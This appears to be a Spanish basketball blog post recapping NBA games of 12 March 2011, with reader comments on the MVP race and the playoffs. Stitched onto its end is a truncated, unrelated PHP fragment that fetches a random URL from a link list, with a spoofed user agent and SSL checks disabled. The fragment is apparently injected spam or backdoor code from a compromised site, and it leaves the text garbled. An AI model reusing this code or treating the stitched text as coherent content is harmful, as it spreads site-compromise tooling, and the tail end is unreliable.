La Crónica (13/03/2011)

14 de March de 2011 por txusma

Nos sentimos obligados a empezar la crónica con los 56 puntos que anotaron ayer los Bucks en su derrota frente a Boston (56-87). Earl Barron fue el máximo anotador de su equipo con 10 puntos en un partido infame e impropio de una franquicia que aspira a clasificarse para los Playoffs, aunque sea en el Este. Fue un partido de récords: peor anotación de la historia de la franquicia, menor puntuación en los 3 primeros cuartos (36 puntos) de toda la NBA, menor puntuación en contra de los Celtics y para rematar el pastel un dato: a la media parte los Bucks llevaban más pérdidas que canastas (9 contra 8). Para llorar y no parar. Por los Celtics, buen partido de los recién llegados.

En cambio, sus máximos rivales por hacerse con un plaza de Playoffs, Pacers y Bobcats ganaron anoche. Indiana dio la sorpresa imponiéndose a en el Madison Square Garden (106-93). Curioso que consiguieran acabar su racha de 6 partidos perdidos justo cuando contaban con la baja de Danny Granger. Los Knicks naufragaron ante el ímpetu de Tyler Hansbrough que al acabar cada partido debe llamar a O’Brien para preguntarle si le ha visto por la tele. Y los Bobcats vencieron a los Raptors en un final apretado (95-90). El retorno de Jackson y Thomas así como el buen nivel de forma de Gerald Henderson dan esperanzas a los de Charlotte de clasificarse para los Playoffs. Parece una carrera por ver quién es el menos malo.

Y en el resto de partidos, palizas. De los Thunder a los Cavs (95-75), de los Magic a los Suns (111-88) y de los Warriors a los Wolves (77-100). Orlando venció por primera vez en Phoenix en 9 temporadas gracias a un Dwight Howard que anotó su punto número 10.000. Y en la bahía de Okland, Kevin Love finiquitó su récord de dobles-dobles, al quedarse en tan sólo 6 puntos. Han sido 53. Una barbaridad se mire por donde se mire.

PREMIOS

MVP: Los Warriors pasaron por encima de los Wolves, gracias a la buena defensa de Lee sobre Love, y al talento ofensivo de Stephen Curry. 24 puntos, 9 rebotes, 6 asistencias y 2 robos.

Rookie: ¿Rookies? ¿Dónde? Por destacar algo, destacamos los 5 tapones de Ekpe Udoh. Eso sí, se quedó sin anotar un solo tiro de campo.

Sorpresa: Gran final de temporada el de Tyler Hansbrough. Desde que se fue O’Brien, ha disfrutado de más minutos y él ha mejorado a pasos agigantados. Anoche fueron 29 puntos y 8 rebotes. Habrá que vigilarle de cara al próximo año.

Decepción: No hace falta decir nada más. 56 puntos dan vergüenza en cualquier competición profesional de baloncesto.

Esfuerzo en vano: Amare Stoudamire se quedó muy solo en el Madison. Sus 28 puntos fueron insuficientes incluso para inquietar a los Pacers.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Escalofríos dan ver esos datos Txusma,lamentable el partido de los cervatillos que venían de meterle 102 pts a un gran equipo defensivo como son los Sixers.
    Ni los tiros libres metían macho… este año ya hemos visto varias veces partidos de 50 pts

      Citar

  2. Denise dice:
    #2

    jaja, el segundo jugador de los Bucks que menos jugó (barron con 10 minutos) fue el que mas punto metió.
    Supongo que lo haría en los minutos de la basura, pero vamos, que desde el segundo cuarto, hubo minutos de la basura. Ay….Lemontus, donde estarás metido….
    Hoy no me meteré con los Knicks, solo decir que a nivel individual, la decepción es el 1 de 12 de Toney Douglas.
    Ni Rose, ni leches, el MVP debería ser para Howard que ya empieza a meter hasta los tiros libres.

      Citar

  3. TheDeerHunter dice:
    #3

    yo diría que la cosa va a estar entre Rose y él

      Citar

  4. Denise dice:
    #4

    En los ultimos años han salido un montón de bases-escoltas tipo Rose haciendo esos numeros. Digamos que, estamos acostumbrado a ellos, pero desde el O’Neal del threepeat no veiamos a un center tan superior en la zona, y ojo, a los nuevos movimientos que está desarrollando.
    Y porque Van Gundy a veces se olvida de él y no le dan bola!!

      Citar

  5. Sancho88 dice:
    #5

    Sigo apoyando tu campaña a favor del MVP de D-Howard, Denise. Olajuwon en los 90, Shaquille en el 2000 y ahora Howard. Lo de sus tiros libres también va por días. Ayer buenísimo 8 de 13. Con esos porcentajes, a Orlando no se le escaparían algunos partidos que se le escapan, como por ejemplo el del otro día contra GSW hizo 5 de 10, pero en el último cuarto falló bastantes de esos 5. Tiene que practicar y practicar, no le queda otra. No le puede valer con apuntar al aro y que dé siempre atrás.
    Los Bucks fuera de casa son una cosa penosa de equipo, hasta le han quitado a Salmons las ganas por irse a los 30 puntos, que eran sus noches maravillosas en Kings y Chicago. Scott Skiles tendrá algo que ver? Yo creo que sí. No sé que pensais vosotros, pero objetivamente son la gran decepción de la temporada. Ahí están los tres colosos (Indiana, Charlotte y Milwaukee), jugándose el octavo de conferencia. Superarán el record de 37-45 de los Hawks de hace tres temporadas? Se admiten apuestas en el bar de Moe.
    Y nada, la liga más o menos entra en sus últimos 18-19 partidos, se nos van apagando las opciones de Phoenix y Houston. Ojalá que descalabre a saco Paul, porque los PO sin Nash no son lo mismo. Yo crearía las finales alternativas. Una serie a siete partidos entre Phoenix y GSW, o GSW y New York, o New York y Phoenix… o, todos mezclados, jugandon cada día con un equipo distinto, donde estuviera prohibido defender y todos los partidos acabasen 140 a 135, con series de triples de 8 de 15 de Monta Ellis, 6 de 10 de Stephen Curry y 7 de 16 de Dorrell Wright. En serio, son los partidos que molan. Porque tragarse a equipos como Bucks, Charlotte (me parecen odiosos con o sin Larry Brown), o Utah, es un ejercicio de masoquismo. Vivan las orgías de puntos, jeje

      Citar

  6. Ru dice:
    #6

    Y yo que ponía el grito en el cielo por el esperpéntico 49-48 en ACB de hace unos días y ahora llegan los Bucks y me zasean en toda la boca…xDD

      Citar

  7. PIRATA dice:
    #7

    Referenta al MVP yo destacaria la classificación de jugadores por eficiencia, es donde se ve mejor a los buenos de verdad, si la mirais después del monstruo Love viene Howard, para mi seria merecidísimo el MVP para él.

      Citar

  8. Denise dice:
    #8

    – Los Suns lo tienen dificil para alcanzar la octava plaza del Oeste, pero, están a 3 victorias y tienen 3 partidos jugados menos que el séptimo, ojalá den la sorpresa y se cuelen en detrimento de los Jazz.
    – A los Bobcats habría que cambiarle el nombre por el de Charlotte Dreams o Charlotte Yawn.
    – Apunte de ACB: Garbajosa al Unicaja Málaga tras llevarse la patada en el ciezo del Madrid.

      Citar

  9. Txusma dice:
    #9

    Iberdrola está negociando con los Blazers para cambiar el nombre de su pabellón:

    http://www.portlandtribune.com/sports/story.php?story_id=130005715841548000

    Iberdrola Garden?

      Citar

  10. Denise dice:
    #10

    Lo unico que deseo es que las franquicias NBA no se prostituyan y empiecen a llevar patrocinadores y nombres de marcas comerciales en sus bonitas e históricas camisetas.
    Una de las mejores diferencias de la NBA y creo que del resto de grandes ligas americanas con respecto al futbol, al baloncesto y demás deportes continentales.

      Citar

  11. Nacho dice:
    #11

    Denise, molaría que los Suns estuviesen en PO, pero su rival no son Utah, que tampoco están. Del 5º al 8º están Denver, Blazzers, Hornets y Grizzlies, y no creo que Nash y compañía lleguen a ninguno de ellos. Los más flojos en teoría, los chicos de Paul, están aguantando a base de bien y callándonos la boca a muchos. Podrían caer los Grizzlies, pero a día de hoy son más consistentes que Phoenix.
    Creo que ya están decididos los PO en el Oeste, solo falta el orden. Salvo el 1º y el 4º, que parecen tener dueño seguro en Spurs y Thunder, lo demás todo puede pasar. Y ojito, que los de Portland son los cocos de primera ronda, yo pagaría por no cruzarme con ellos.
    Lanzo una pregunta, ¿cree alguien que Durant y compañía pueden mojarle la oreja a los Spurs?

      Citar

  12. PIRATA dice:
    #12

    Yo pensaba lo mismo y creo que si………………

      Citar

  13. Denise dice:
    #13

    Tienes razón, octavos van los Grizzlies, pero con 3 partidos jugados más que los Suns…
    Los Spurs van a caer en semis de conferencia.

      Citar

  14. The wolf dice:
    #14

    final de conferencia oeste lakers – thunder…y cuidadin que no caigan los angelinos…

      Citar

  15. Sancho88 dice:
    #15

    Con Bynum en estos numeros Thunder no tiene nada que hacer, no nos engañemos. Si aguanta hasta PO en este estado Lakers son favoritos

      Citar

  16. Len Bias dice:
    #16

    No hará muchos números, pero qué bien juega Matt Barnes.

    Por cierto, a 7 minutos de acabar el partido…
    Dwight Howard: 9 pérdidas
    LA Lakers: 3 pérdidas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>